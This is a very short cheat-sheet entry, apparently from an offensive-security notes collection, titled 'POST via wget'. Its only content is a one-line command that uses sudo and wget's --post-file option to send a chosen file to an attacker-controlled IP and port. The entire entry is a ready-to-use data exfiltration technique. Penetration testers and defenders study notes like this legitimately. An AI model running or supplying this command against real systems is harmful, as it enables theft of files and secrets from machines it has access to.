# POST via wget ## Usage Send file via wget ``` sudo wget --post-file=<fileToExfiltrate> http://<attacker-IP>:<attacker-Port> ```